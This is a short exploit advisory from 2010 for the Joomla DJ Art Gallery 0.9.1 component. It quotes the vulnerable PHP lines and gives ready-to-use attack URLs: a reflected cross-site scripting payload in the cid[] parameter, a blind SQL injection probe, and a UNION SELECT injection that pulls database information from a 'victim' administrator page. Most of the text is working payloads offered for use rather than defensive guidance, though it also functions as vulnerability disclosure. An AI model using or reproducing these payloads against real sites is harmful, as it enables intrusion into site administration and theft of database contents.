Joomla DJ Art Gallery 0.9.1 Cross Site Scripting / SQL Injection

`#Exploit Title: Joomla Component com_djartgallery Multiple Vulnerabilities  
  
#Date: 04/06/2010   
  
#Author: d0lc3  
  
#Software Link: http://www.design-joomla.eu/downloads/download/components/dj-artgallery.html  
  
#Version: 0.9.1  
  
#Tested on: Linux ubuntu32 2.6.32-22-generic x64  
  
#Summary:  
  
[+] Cross Site Scripting on administrator/components/com_djartgallery/views/editimage/tmpl/default.php:  
  
We can fond this code on line 183:  
...   
<input type="hidden" name="id" value="<?php echo JRequest::getVar('id'); ?>" />  
<input type="hidden" name="option" value="com_djartgallery" />  
<input type="hidden" name="task" value="editImage" />  
...  
  
You must see it }x)   
  
<input type="hidden" name="id" value="<?php echo JRequest::getVar('id'); ?>" />  
  
Method to exploit this could be next code injection:  
  
http://localhost/joomla/administrator/index.php?option=com_djartgallery&task=editItem  
&cid[]=%22%3E%3C/form%3E%3CSCRIPT%3Ealert%28%22XSS%20by%20r0i%22%29;%3C/script%3E  
  
[+]Blind SQL Injection  
  
Also we can extract it databases information through Blind SQL Injection, on same parameter, how to we will see on next code:  
administrator/components/com_djartgallery/controller.php, line 382:  
  
$link = 'index.php?option=com_djartgallery&task=com_djartgallery&task=editItem&cid[]='.JRequest::getVar('id');  
  
To exploit it:  
  
http://victim/administrator/index.php?option=com_djartgallery&task=editItem  
&cid[]=1'+and+1=1+--+  
  
Field 'Select Article' its changed when reply its true/false; but too its likely that run UNION injection:  
  
http://victim/administrator/index.php?option=com_djartgallery&task=editItem  
&cid[]=-1%27/*!UNION%20SELECT%20@@version,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25*/+--+  
  
  
  
by r0i by r0i by r0i by r0i by r0i by r0i by r0i by r0i by r0i by r0i by r0i by r0i   
  
`